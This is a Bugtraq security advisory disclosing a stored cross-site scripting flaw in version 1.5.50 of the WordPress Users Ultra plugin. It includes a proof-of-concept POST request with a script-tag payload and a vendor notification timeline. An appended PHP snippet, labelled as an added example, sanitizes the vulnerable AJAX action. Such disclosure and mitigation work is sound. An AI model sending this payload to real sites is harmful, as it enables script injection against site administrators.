Message-Id: <201512021832.tB2IWVYl002067@sf01web1.securityfocus.com>
Date: Wed, 2 Dec 2015 18:32:31 GMT
From: pan.vagenas@...il.com
To: bugtraq@...urityfocus.com
Subject: WordPress Users Ultra Plugin [Persistence XSS]

* Exploit Title: WordPress Users Ultra Plugin [Persistence XSS]
* Discovery Date: 2015/10/20
* Public Disclosure Date: 2015/12/01
* Exploit Author: Panagiotis Vagenas
* Contact: https://twitter.com/panVagenas
* Vendor Homepage: http://usersultra.com
* Software Link: https://wordpress.org/plugins/users-ultra/
* Version: 1.5.50
* Tested on: WordPress 4.3.1
* Category: webapps


Description
================================================================================

Any registered user can add new subscription packages or modify existing ones. The plugin does not sanitize 
package details before saving them to the database. This allows a malicious user to include JS code in the 
package name and/or package description.

PoC
================================================================================

- Send a POST request to `http://vuln.site.tld/wp-admin/admin-ajax.php` with data: 
    `action=package_add_new&p_name=a<script>alert(1)</script>`
- Visit `http://vuln.site.tld/wp-admin/admin.php?page=userultra&tab=membership` as admin or go to the page that 
    contains package information on the front end.

Timeline
================================================================================

2015/10/29 - Vendor notified via email
2015/11/11 - Vendor notified via contact form on his website
2015/11/13 - Vendor notified via support forums at wordpress.org
2015/11/14 - Vendor responded and received report through email

Solution
================================================================================
  
No official solution yet exists.
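
As an interim mitigation, the missing checks can be placed in front of the AJAX action named in the PoC. This is an added example, not code from the advisory or from the Users Ultra plugin; the `uu_guard_*` names are hypothetical, and it assumes the plugin's handler is hooked on `wp_ajax_package_add_new` at a later priority, reads its fields from `$_POST`/`$_REQUEST`, and that only administrators (`manage_options`) should manage packages.

```php
<?php
/*
 * Added example, not Users Ultra code: a must-use plugin acting as a virtual patch.
 * Assumptions: the vulnerable handler is hooked on wp_ajax_package_add_new, reads
 * its fields from $_POST/$_REQUEST, and only administrators should manage packages.
 */

/* Recursively strip markup from every string value of a request array. */
function uu_guard_clean( array $fields ) {
    foreach ( $fields as $key => $value ) {
        if ( is_array( $value ) ) {
            $fields[ $key ] = uu_guard_clean( $value );
        } elseif ( is_string( $value ) ) {
            // WordPress sanitizer when loaded, plain strip_tags() otherwise.
            $fields[ $key ] = function_exists( 'sanitize_text_field' )
                ? sanitize_text_field( $value )
                : trim( strip_tags( $value ) );
        }
    }
    return $fields;
}

/* Runs before the plugin's own handler (priority 0). */
function uu_guard_package_add_new() {
    // Reject callers who are not administrators (assumed policy).
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Forbidden', '', array( 'response' => 403 ) );
    }
    // Sanitize every submitted field, since the description parameter name is not known.
    $_POST    = uu_guard_clean( $_POST );
    $_REQUEST = uu_guard_clean( $_REQUEST );
}

if ( function_exists( 'add_action' ) ) {
    // Inside WordPress: register the guard ahead of the plugin's handler.
    add_action( 'wp_ajax_package_add_new', 'uu_guard_package_add_new', 0 );
} else {
    // Stand-alone run (php file.php) on a constructed request.
    print_r( uu_guard_clean( array(
        'action' => 'package_add_new',
        'p_name' => 'a<script>alert(1)</script>',
    ) ) );
}
```

The guard does not cover the request that modifies existing packages, whose action name the advisory does not give, or package details already stored in the database. Pages that print package fields should still escape them on output with `esc_html()`.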
